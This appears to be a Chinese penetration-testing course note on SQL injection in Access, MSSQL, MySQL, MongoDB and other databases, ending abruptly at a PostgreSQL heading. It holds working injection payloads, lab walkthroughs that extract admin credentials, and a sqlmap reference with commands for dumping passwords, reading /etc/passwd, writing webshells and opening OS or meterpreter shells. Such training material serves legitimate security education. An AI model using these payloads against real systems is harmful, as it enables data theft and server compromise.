渗透测试培训Day14 SQL注入之Oracle,MongoDB等注入

　　渗透测试培训Day14 SQL注入之Oracle,MongoDB等注入

　　

　　我喜欢一个人

　　就像喜欢一阵风

　　藏在你心里

　　习桑前言

　　SQL作用在关系型数据库上面什么是关系型数据库?关系型数据库是由一张张的二维表组成的 常见的关系型数据库厂商有 MySQL、SQLite、SQL Server、Oracle 由于MySQL是免费的 所以企业一般用MySQL的居多 Web SQL是前端的数据库 它也是本地存储的一种 使用SQLite实现 SQLite是一种轻量级数据库 它占的空间小 支持创建表，插入、修改、删除表格数据 但是不支持修改表结构 如删掉一纵列 修改表头字段名等 但是可以把整张表删了 同一个域可以创建多个DB 每个DB有若干张表。与数据库产生交互就有可能存在注入攻击不只是MySQL数据库还有Oracle，MongoDB等数据库也可能会存在注入攻击

　　

　　

　　简要学习各种数据库的注入特点

　　数据库架构组成，数据库高权限操作

　　简要了解各数据库

　　Access，Mysqlmssql（Microsoft SQL server）mongoDB，postgresqlsqlite，oracle，sybase等<br />Access 表名 列名 数据<br />Access数据库保存在网站源码下面自己网站数据库独立存在所以无法进行跨库也没有文件读写的操作

　　

　　除了Access其他数据库组成架构基本都是大同小异。<br />mysql mssql等数据库名A 表名列名 数据 数据库名B。。。。。。<br />每个数据库功能不同，我们采取注入的时候攻入方式不同<br />什么决定网站注入点用户权限？数据库配置文件的用户，是谁连接的

　　Access偏移注入

　　如果遇到列名猜解不到的情况，则可以使用Access偏移注入原理<br />借用数据库的自连接查询让数据库内部发生乱序从而偏移出所需要的字段在我们的页面上显示用途<br />解决知道Access数据库中知道表名，但是得不到字段的sql注入困境特点<br />a. 成功与否看技巧与运气，不能保证100%成功。b. 无需管理员账号密码字段，直接爆账号密码利用条件<br />a. 已知管理表名b. 已知任意字段（一个或多个会增加机率，最常见的就是id）影响偏移注入成功因素<br />a. 管理表的字段数越少越好（最好是三个:id 账号字段 密码字段）b. 当前注入点的脚本内查询的表内的字段数越多越好流程<br />a. 判断字段数b. 判断表名c. 开始偏移注入<br />

　　本地Access偏移注入靶场

　　

　　偏移量就是逐步增加或递减直到出现结果。*表示可代替的字符串用*代替22，返回界面依旧报错然后用*代替21，依次递减22-16=6，6表示该表中的列名个数

　　

　　*代表6个，后面一串字符代表两倍，就相当于2倍*，12个

　　爆列名数据

　　一级偏移语句：union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)二级偏移语句：union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)

　　

　　二级偏移，3倍*，所以为18个

　　

　　查看登录框源代码的表单值或观察URL特征等也可以针对表或列获取不到的情况猜解表名可能是ZB_admin，观察网站地址特征，是否有前缀。

　　或者看登录框表单值

　　

　　SQL server/MSSQL注入

　　7.1介绍

　　Microsoft SQL Server 是一个全面的数据库平台，使用集成的商业智能 (BI)工具提供了企业级的数据管理。Microsoft SQL Server 数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能，使您可以构建和管理用于业务的高可用和高性能的数据应用程序。

　　7.2过程

　　①判断数据库类型

　　and exists (select * from sysobjects)--返回正常为mssql（也名sql server）and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈

　　②判断数据库版本

　　and 1=@@version--这个语句要在有回显的模式下才可以哦and substring((select  @@version),22,4)='2008'--适用于无回显模式，后面的2008就是数据库版本，         返回正常就是2008的复制代码第一条语句执行效果图（类似）：第二条语句执行效果图：（如果是             2008的话就返回正常）

　　③获取所有数据库的个数 (一下3条语句可供选择使用)

　　1. and 1=(select quotename(count(name)) from master..sysdatabases)--2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --3. and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --   and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --说明：dbid从1-4的数据库一般为系统数据库.

　　⑤获取数据库 （该语句是一次性获取全部数据库的，且语句只适合>=2005，两条语句可供选择使用）

　　 and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))-- and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--

　　⑥获取当前数据库

　　and db_name()>0and 1=(select db_name())--

　　⑦获取当前数据库中的表（有2个语句可供选择使用）【下列语句可一次爆数据库所有表（只限于 mssql2005及以上版本）】

　　and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))-- and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U'  FOR XML PATH(''))--

　　⑧获得表里的列

　　一次爆指定表的所有列（只限于mssql2005及以上版本）：and 1=(select quotename(name) from 数据库名..syscolumns where id =(select  id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))-- and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select  id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--

　　⑨获取指定数据库中的表的列的数据库

　　逐条爆指定表的所有字段的数据（只限于mssql2005及以上版本）：and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--一次性爆N条所有字段的数据（只限于mssql2005及以上版本）：and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--复制代码第一条语句：and 1=(select top 1 * from 指定数据库..指定表名 FOR XML PATH(''))--测试效果图：----------------------------------加上where条件筛选结果出来会更加好，如：where and name like '%user%'  就会筛选出含有user关键词的出来。用在筛选表段时很不错。

　　转自：http://www.myhack58.com/Article/html/3/8/2015/63146.htm

　　PostgraSQL注入原理

　　https://www.webshell.cc/524.htmlhttps://www.cnblogs.com/yilishazi/p/14710349.htmlhttps://www.jianshu.com/p/ba0297da2c2e

　　Oracle注入

　　https://www.cnblogs.com/peterpan0707007/p/8242119.html

　　MongoDB注入

　　

　　https://blog.csdn.net/weixin_33881753/article/details/87981552https://www.secpulse.com/archives/3278.html

　　各数据库手工注入

　　MySQL：1.找到注入点 and 1=1 and 1=2 测试报错2.order by 5 # 到5的时候报错，获取字段总数为43.id=0(不是1就行，强行报错) union select 1,2,3,4 # 联合查询，2和3可以显示信息4.获取数据库信息user() ==>rootdatabase() ==>mozhe_Discuz_StormGroupversion() ==>5.7.22-0ubuntu0.16.04.15.获取数据库表table_name 表名information_schema.tables 系统生成信息表table_schema=数据库名16进制或者用单引号括起来改变limit 0，1中前一个参数，得到两个表 StormGroup_member notice6.获取列名结果如下 id,name,password,status7.脱裤<br />Access：1.and 1=2 报错找到注入点2.order by 获取总字段3.猜解表名 and exists (select * from admin) 页面返回正常，说明存在admin表4.猜解列名 and exists(select id from admin) 页面显示正常，admin表中存在id列 username,passwd 同样存在5.脱裤 union select 1,username,passwd,4 from adminMSSQL：1.and 1=2报错2.order by N# 获取总字段3.猜表名 and exists(select * from manage) 表名manage存在4.猜解列名 and exists(select id from manage) 列名id存在，同样username,password也存在5.脱裤 and exists (select id from manage where id=1 ) 证明id=1存在and exists (select id from manage where%20 len(username)=8 and id=1 ) 猜解username字段长度为8and exists (select id from manage where%20 len(password)=16 and id=1 ) 猜解password字段长度为16可用Burp的Intruder功能辅助猜解猜解username第1到8位的字符，ASCII转码 admin_mz猜解password第1到16位的字符，ASCII转码(Burp 爆破)转ASCII的py脚本：72e1bfc3f01b7583 MD5解密为97285101<br />SQLite：1.找注入点 and 1=12.order by N 猜字段 43.猜数据库offset ==>0~2有三个数据库：WSTMart_regnotice_sybasesqlite_sequence4.猜列共有3个字段：id,name,password5.脱裤<br />MongoDB:1.id=1′ 单引号注入报错2.闭合语句，查看所有集合3.查看指定集合的数据[0] 代表第一条数据，可递增<br />DB2:1.and 1=2 判断注入点2.order by N 获取字段数3.爆当前数据库GAME_CHARACTER4.列表NAME5.脱裤<br />PostgreSQL:1.and 1=2 判断注入点2.order by N 获取字段3.爆数据库4.列表5.列字段6.拖库<br />Sybase数据库：1.and 1=2 判断注入点2.order by N 获取总字段3.爆数据库4.列表5.列字段6.查状态结果为：zhang7.反选爆用户名结果为：mozhe8.猜解密码<br />Oracle：1.and 1=12.order by3.爆数据库4.列表5.列字段6.拖库加上状态：1 where STATUS=1

　　简要学习各种注入工具的使用指南

　　熟悉工具的主持库，注入模式，优缺点等sqlmap，NoSQLAttack，Pangolin等

　　

　　sqlmap基本操作sqlmap简介sqlmap支持五种不同的注入模式：

　　1、基于布尔的盲注即可以根据返回页面判断条件真假的注入2、基于时间的盲注即不能根据页面返回内容判断任何信息用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。3、基于报错注即页面会返回错误信息或者把注入的语句的结果直接返回在页面中4、联合查询注入可以使用union的情况下的注入5、堆查询注入可以同时执行多条语句的执行时的注入

　　sqlmap支持的数据库有：

　　MySQL, Oracle, PostgreSQLMicrosoft SQL ServerMicrosoft Access, IBM DB2SQLite, Firebird,Sybase和SAP MaxDB

　　检测注入：

　　基本格式sqlmap -u “http://www.vuln.cn/post.php?id=1”默认使用level1检测全部数据库类型sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3指定数据库类型为mysql，级别为3（共5级，级别越高，检测越全面）跟随302跳转当注入页面错误的时候，自动跳转到另一个页面的时候需要跟随302，当注入错误的时候，先报错再跳转的时候，不需要跟随302。目的就是：要追踪到错误信息。

　　cookie注入

　　当程序有防get注入的时候，可以使用cookie注入sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2（只有level达到2才会检测cookie）

　　从post数据包中注入

　　可以使用burpsuite或者temperdata等工具来抓取post包sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数

　　注入成功后

　　获取数据库基本信息sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 –dbs查询有哪些数据库sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test –tables查询test数据库中有哪些表sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin –columns查询test数据库中admin表有哪些字段sqlmap -u “http://www.vuln.cn/post.php?id=1” –dbms mysql –level 3 -D test -T admin -C “username,password” –dumpdump出字段username与password中的数据其他命令参考下面从数据库中搜索字段sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password在dedecms数据库中搜索字段admin或者password。

　　读取与写入文件

　　首先找需要网站的物理路径，其次需要有可写或可读权限。–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 （物理路径）–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 （mssql xp_shell）–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径#示例：sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”使用shell命令：sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell接下来指定网站可写目录：“E:\php\htdocs\dvwa”#注：mysql不支持列目录，仅支持读取单个文件。sqlserver可以列目录，不能读写文件，但需要一个（xp_dirtree函数）

　　sqlmap基本操作

　　基本操作笔记：

　　-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p "page,id")-D "" #指定数据库名-T "" #指定表名-C "" #指定字段-s "" #保存注入过程到一个文件,还可中断，下次恢复在注入(保存：-s "xx.log" 恢复:-s "xx.log" --resume)--level=(1-5) #要执行的测试水平等级，默认为1--risk=(0-3) #测试执行的风险等级，默认为1--time-sec=(2,5) #延迟响应，默认为5--data #通过POST发送数据--columns #列出字段--current-user #获取当前用户名称--current-db #获取当前数据库名称--users #列数据库所有用户--passwords #数据库用户所有密码--privileges #查看用户权限(--privileges -U root)-U #指定数据库用户--dbs #列出所有数据库--tables -D "" #列出指定数据库中的表--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段--dump-all #列出所有数据库所有表--exclude-sysdbs #只列出用户自己新建的数据库和表--dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T users -D master -C surname)--dump -T "" -D "" --start 2 --top 4 # 列出指定数据库的表的2-4字段的数据--dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)--os #指定系统(Linux,Windows)-v #详细的等级(0-6) 0：只显示Python的回溯，错误和关键消息。 1：显示信息和警告消息。 2：显示调试消息。 3：有效载荷注入。 4：显示HTTP请求。 5：显示HTTP响应头。 6：显示HTTP响应页面的内容--privileges #查看权限--is-dba #是否是数据库管理员--roles #枚举数据库用户角色--udf-inject #导入用户自定义函数（获取系统权限）--union-check #是否支持union 注入--union-cols #union 查询表记录--union-test #union 语句测试--union-use #采用union 注入--union-tech orderby #union配合order by--data "" #POST方式提交数据(--data "page=1&id=2")--cookie "用;号分开" #cookie注入(--cookies=”PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low”)--referer "" #使用referer欺骗(--referer "http://www.baidu.com")--user-agent "" #自定义user-agent--proxy "http://127.0.0.1:8118" #代理注入--string="" #指定关键词,字符串匹配.--threads #采用多线程(--threads 3)--sql-shell #执行指定sql命令--sql-query #执行指定的sql语句(--sql-query "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1" )--file-read #读取指定文件--file-write #写入本地文件(--file-write /test/test.txt --file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)--file-dest #要写入的文件绝对路径--os-cmd=id #执行系统命令--os-shell #系统交互shell--os-pwn #反弹shell(--os-pwn --msf-path=/opt/framework/msf3/)--msf-path= #matesploit绝对路径(--msf-path=/opt/framework/msf3/)--os-smbrelay #--os-bof #--reg-read #读取win系统注册表--priv-esc #--time-sec= #延迟设置 默认--time-sec=5 为5秒-p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" #指定user-agent注入--eta #盲注/pentest/database/sqlmap/txt/common-columns.txt 字段字典 　 common-outputs.txtcommon-tables.txt 表字典keywords.txtoracle-default-passwords.txtuser-agents.txtwordlist.txt<br />

　　常用语句 :

　　1./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-f -b --current-user --current-db --users --passwords --dbs -v 02./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --passwords -U root --union-use -v 23./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --dump -T users -C username -D userdb --start 2 --stop 3 -v 24./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --dump -C "user,pass" -v 1 --exclude-sysdbs5./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --sql-shell -v 26./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --file-read "c:\boot.ini" -v 27./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --file-write /test/test.txt --file-dest /var/www/html/1.txt -v 28./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --os-cmd "id" -v 19./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --os-shell --union-use -v 210./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 111./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --os-pwn --msf-path=/opt/framework/msf3 -v 112./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --os-bof --msf-path=/opt/framework/msf3 -v 113./sqlmap.py -u http://www.xxxxx.com/test.php?p=2--reg-add --reg-key="HKEY_LOCAL_NACHINE\SOFEWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=114./sqlmap.py -u http://www.xxxxx.com/test.php?p=2-b --eta15./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"16./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"17./sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"18./sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 319./sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 120./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner21./sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --cookie="PHPSESSID=mvijocbglq6pi463rlgk1e4v52; security=low" --string='xx' --dbs --level=3 -p "uid"

　　简单的注入流程 :

　　1.读取数据库版本，当前用户，当前数据库

　　sqlmap -u http://www.xxxxx.com/test.php?p=2-f -b --current-user --current-db -v 1

　　2.判断当前数据库用户权限

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--privileges -U 用户名 -v 1sqlmap -u http://www.xxxxx.com/test.php?p=2--is-dba -U 用户名 -v 1

　　3.读取所有数据库用户或指定数据库用户的密码

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--users --passwords -v 2sqlmap -u http://www.xxxxx.com/test.php?p=2--passwords -U root -v 2

　　4.获取所有数据库

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--dbs -v 2

　　5.获取指定数据库中的所有表

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--tables -D mysql -v 2

　　6.获取指定数据库名中指定表的字段

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--columns -D mysql -T users -v 2

　　7.获取指定数据库名中指定表中指定字段的数据

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2

　　8.file-read读取web文件

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--file-read "/etc/passwd" -v 2

　　9.file-write写入文件到web

　　sqlmap -u http://www.xxxxx.com/test.php?p=2--file-write /localhost/mm.php --file使用sqlmap绕过防火墙进行注入测试

　　sqlmap详细命令

　　–is-dba 当前用户权限（是否为root权限）–dbs 所有数据库–current-db 网站当前数据库–users 所有数据库用户–current-user 当前数据库用户–random-agent 构造随机user-agent–passwords 数据库密码–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理–time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）——————————————————————————————————

　　Options（选项）

　　–version 显示程序的版本号并退出

　　-h, –help 显示此帮助消息并退出-v VERBOSE 详细级别：0-6（默认为1）保存进度继续跑：sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存进度sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢复已保存进度

　　Target（目标）

　　以下至少需要设置其中一个选项，设置目标URL。-d DIRECT 直接连接到数据库。-u URL, –url=URL 目标URL。-l LIST 从Burp或WebScarab代理的日志中解析目标。-r REQUESTFILE 从一个文件中载入HTTP请求。-g GOOGLEDORK 处理Google dork的结果作为目标URL。-c CONFIGFILE 从INI配置文件中加载选项。

　　Request（请求）

　　这些选项可以用来指定如何连接到目标URL。–data=DATA 通过POST发送的数据字符串–cookie=COOKIE HTTP Cookie头–cookie-urlencode URL 编码生成的cookie注入–drop-set-cookie 忽略响应的Set – Cookie头信息–user-agent=AGENT 指定 HTTP User – Agent头–random-agent 使用随机选定的HTTP User – Agent头–referer=REFERER 指定 HTTP Referer头–headers=HEADERS 换行分开，加入其他的HTTP头–auth-type=ATYPE HTTP身份验证类型（基本，摘要或NTLM）(Basic, Digest or NTLM)–auth-cred=ACRED HTTP身份验证凭据（用户名:密码）–auth-cert=ACERT HTTP*敏*感*词*（key_file，cert_file）–proxy=PROXY 使用HTTP代理连接到目标URL–proxy-cred=PCRED HTTP代理身份验证凭据（用户名：密码）–ignore-proxy 忽略系统默认的HTTP代理–delay=DELAY 在每个HTTP请求之间的延迟时间，单位为秒–timeout=TIMEOUT 等待连接超时的时间（默认为30秒）–retries=RETRIES 连接超时后重新连接的时间（默认3）–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式–safe-url=SAFURL 在测试过程中经常访问的url地址–safe-freq=SAFREQ 两次访问之间测试请求，给出安全的URL

　　Enumeration（枚举）

　　这些选项可以用来列举后端数据库管理系统的信息表中的结构和数据此外，您还可以运行您自己的SQL语句。-b, –banner 检索数据库管理系统的标识–current-user 检索数据库管理系统当前用户–current-db 检索数据库管理系统当前数据库–is-dba 检测DBMS当前用户是否DBA–users 枚举数据库管理系统用户–passwords 枚举数据库管理系统用户密码哈希–privileges 枚举数据库管理系统用户的权限–roles 枚举数据库管理系统用户的角色–dbs 枚举数据库管理系统数据库-D DBname 要进行枚举的指定数据库名-T TBLname 要进行枚举的指定数据库表（如：-T tablename –columns）–tables 枚举的DBMS数据库中的表–columns 枚举DBMS数据库表列–dump 转储数据库管理系统的数据库中的表项–dump-all 转储所有的DBMS数据库表中的条目–search 搜索列（S），表（S）和/或数据库名称（S）-C COL 要进行枚举的数据库列-U USER 用来进行枚举的数据库用户–exclude-sysdbs 枚举表时排除系统数据库–start=LIMITSTART 第一个查询输出进入检索–stop=LIMITSTOP 最后查询的输出进入检索–first=FIRSTCHAR 第一个查询输出字的字符检索–last=LASTCHAR 最后查询的输出字字符检索–sql-query=QUERY 要执行的SQL语句–sql-shell 提示交互式SQL的shell

　　Optimization（优化）

　　这些选项可用于优化SqlMap的性能。-o 开启所有优化开关–predict-output 预测常见的查询输出–keep-alive 使用持久的HTTP（S）连接–null-connection 从没有实际的HTTP响应体中检索页面长度–threads=THREADS 最大的HTTP（S）请求并发量（默认为1）

　　Injection（注入）

　　这些选项可以用来指定测试哪些参数提供自定义的注入payloads和可选篡改脚本。-p TESTPARAMETER 可测试的参数（S）–dbms=DBMS 强制后端的DBMS为此值–os=OS 强制后端的DBMS操作系统为这个值–prefix=PREFIX 注入payload字符串前缀–suffix=SUFFIX 注入payload字符串后缀–tamper=TAMPER 使用给定的脚本（S）篡改注入数据

　　Detection（检测）

　　这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。–level=LEVEL 执行测试的等级（1-5，默认为1）–risk=RISK 执行测试的风险（0-3，默认为1）–string=STRING 查询时有效时在页面匹配字符串–regexp=REGEXP 查询时有效时在页面匹配正则表达式–text-only 仅基于在文本内容比较网页

　　Techniques（技巧）

　　这些选项可用于调整具体的SQL注入测试。–technique=TECH SQL注入技术测试（默认BEUST）–time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）–union-cols=UCOLS 定列范围用于测试UNION查询注入–union-char=UCHAR 用于暴力猜解列数的字符

　　Fingerprint（指纹）

　　-f, –fingerprint 执行检查广泛的DBMS版本指纹

　　Brute force（蛮力）

　　这些选项可以被用来运行蛮力检查。–common-tables 检查存在共同表–common-columns 检查存在共同列

　　User-defined function injection

　　（用户自定义函数注入）

　　这些选项可以用来创建用户自定义函数。–udf-inject 注入用户自定义函数–shared-lib=SHLIB 共享库的本地路径

　　File system access（访问文件系统）

　　这些选项可以被用来访问后端数据库管理系统的底层文件系统。–file-read=RFILE 从后端的数据库管理系统文件系统读取文件–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

　　Operating system access

　　（操作系统访问）

　　这些选项可以用于访问后端数据库管理系统的底层操作系统。–os-cmd=OSCMD 执行操作系统命令–os-shell 交互式的操作系统的shell–os-pwn 获取一个OOB shell，meterpreter或VNC–os-smbrelay 一键获取一个OOB shell，meterpreter或VNC–os-bof 存储过程缓冲区溢出利用–priv-esc 数据库进程用户权限提升–msf-path=MSFPATH Metasploit Framework本地的安装路径–tmp-path=TMPPATH 远程临时文件目录的绝对路径Windows注册表访问：这些选项可以被用来访问后端数据库管理系统Windows注册表。–reg-read 读一个Windows注册表项值–reg-add 写一个Windows注册表项值数据–reg-del 删除Windows注册表键值–reg-key=REGKEY Windows注册表键–reg-value=REGVAL Windows注册表项值–reg-data=REGDATA Windows注册表键值数据–reg-type=REGTYPE Windows注册表项值类型这些选项可以用来设置一些一般的工作参数。-t TRAFFICFILE 记录所有HTTP流量到一个文本文件中-s SESSIONFILE 保存和恢复检索会话文件的所有数据–flush-session 刷新当前目标的会话文件–fresh-queries 忽略在会话文件中存储的查询结果–eta 显示每个输出的预计到达时间–update 更新SqlMap–save file保存选项到INI配置文件–batch 从不询问用户输入，使用所有默认配置。

　　Miscellaneous（杂项）

　　–beep 发现SQL注入时提醒–check-payload IDS对注入payloads的检测测试–cleanup SqlMap具体的UDF和表清理DBMS–forms 对目标URL的解析和测试形式–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果–page-rank Google dork结果显示网页排名（PR）–parse-errors 从响应页面解析数据库管理系统的错误消息–replicate 复制转储的数据到一个sqlite3数据库–tor 使用默认的Tor（Vidalia/ Privoxy/ Polipo）代理地址–wizard 给初级用户的简单向导界面

　　思维导图

　　

　　涉及资源https://www.cnblogs.com/bmjoker/p/9326258.html<br />https://blog.csdn.net/qq_39936434/category_9103379.html

　　案例演示1. Access注入用sqlmap判断数据库类型

　　

　　尝试猜字段数，order by 5时网页有回显，所以字段数为4:46604/new_list.asp?id=1 order by 5

　　Access只是单纯的数据库，只有数据，没有数据库名，数据库版本，操作系统等功能，没有information_shcema。可直接查询数据，获取表名，列名。尝试联合注入查询时没有反应:46604/new_list.asp?id=-1 union select 1,2,3,4

　　用猜解方式猜解表名，列名（常用的一些表名，如admin，admin_login等）网页出现回显:46604/new_list.asp?id=-1 union select 1,2,3,4 from admin

　　在回显位尝试猜解字段

　　

　　使用sqlmap跑出来的结果是一样的：sqlmap -u :49010/new_list.asp?id=1 -T admin --colimns

　　

　　sqlmap -u :49010/new_list.asp?id=1 -T admin -C username,passwd --dump

　　

　　2. Access偏移注入偏移注入的使用目前猜测出了表名，但是怎么都猜不出列名，使用联合查询法来进行偏移注入

　　

　　接下来测出偏移量，其实这个偏移量就是admin这张表的列的个数。直接将22改成*号，测试是否回显正常，不正常就一直往前减，一直减少到回显正常为止。

　　这里运气比较好，直接就爆出了密码。但是还没有用户名呢，那么接下来可以打乱顺序来重置爆出来的结果，这里可以使用下列方法来进行完成。

　　从图中可以看出已经爆出了用户名为admin了

　　简单说下语句UNION SELECT 1,2,3,* from (admin as a inner join admin as b on a.id=b.id)，首先为什么从union select 1,2,3,4,5,6,* from变成了1,2,3,*呢是这样推导出来的：order by 9代表有9个回显点1,2,3,4,5,6,*代表admin表的字段数只有3个admin表变成了(admin as a inner join admin as b on a.id=b.id)这里是将admin重命名为了a和b两张表然后通过inner join 将a表和b表的id相同字段展示出来a表和b表本来都是admin表所以id肯定都是相同的（这里要提醒一下，id这个字段可以换成其它字段，但是一定得存在，一般admin表中都存在id字段的）这样做的目的就是可以打乱顺序来爆出其它字段但是由于增加了一张表所以字段数得再减少一个*号的长度所以就从6变成了3

　　3.偏移注入的进阶

　　这样爆东西非常有随机性如果表的字段比较多而这个显示位又比较少的话是很有可能爆不出自己想要的东西的所以接下来学习偏移注入进阶同样通过order by 和union select找到了表为admin但是还是扫不出列名，这次回显点有22个

　　测试admin的列的个数，最终长度为6，而且这次什么都没爆出来

　　开始偏移注入，爆出的结果却是时间

　　此时可以增加a.id或者b.id或者a.id和b.id一起加上去来打乱随机的顺序，时间确实换了，但是又不是我们想要的，这只是一个数字，可能是id值之类的

　　查看网页的源代码，会有隐藏的惊喜

　　

　　发现这里有隐藏起来的回显点，爆出来了用户名为admin，但是还没有密码增加表的个数，修改代码，UNION SELECT 1,2,3,4,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)，查看源代码，成功拿到用户名和密码了。

　　

　　3. SQL server/mssql

　　https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe

　　通过pangolin获取所需数据：

　　还可以进行命令执行和文件管理

　　

　　key

　　##手工注入判断是否是Mssql判断是否是mssql数据库，返回正常，说明该数据库是mssql

　　

　　判断数据库版本号，返回正常，说明版本号正确

　　判断字段长度order by 4正常，遍历至5时报错，说明字段长度为4

　　寻找字符型显示位:44626/new_list.asp?id=-2 union all select null,null,null,null这里使用的是 union all，它和 union select 的区别就是：union select 会自动去除一些重复的字段，在这个靶场使用 union select 是不行的，所以用 union all。使用null 是说明它无关是字符型还是数字型

　　猜测显示位:44626/new_list.asp?id=-2 union all select '1',null,null,null

　　:44626/new_list.asp?id=-2 union all select null,'2',null,null

　　:44626/new_list.asp?id=-2 union all select null,'2','3',null

　　查询相关信息获取版本信息:44626/new_list.asp?id=-2 union all select null,@@version,'3',null

　　获取数据库名:44626/new_list.asp?id=-2 union all select null,db_name(),'3',null

　　获取当前用户名:44626/new_list.asp?id=-2 union all select null,user,'3',null:44626/new_list.asp?id=-2 union all select null,system_user,'3',null:44626/new_list.asp?id=-2 union all select null,current_user,'3',null

　　查询表名:44626/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4

　　:44626/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),'3',4注释：name not in ('manage') 这段语句意思是查询 name 不是 'manage' 的，这样就可以排除 'manage' 从而查询下一个表名

　　announcement之后还是manage，说明就这俩表

　　获取列名:44626/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null注释：col_name 是查询的列名，object_id('manage')是从manage这个表里查询，1 代表的是查询第一个列名

　　这边查询出来第一个列名是 id，我们继续查第二个列名只需要把数字1修改为2就行了col_name(object_id('manage'),2:44626/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null

　　查询出来第二个列名是 username，我们继续查询第三个列名：:44626/new_list.asp?id=-2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null

　　获取数据:44626/new_list.asp?id=-2 union all select null,username,password,null from manage

　　4. PostgraSQL字段

　　

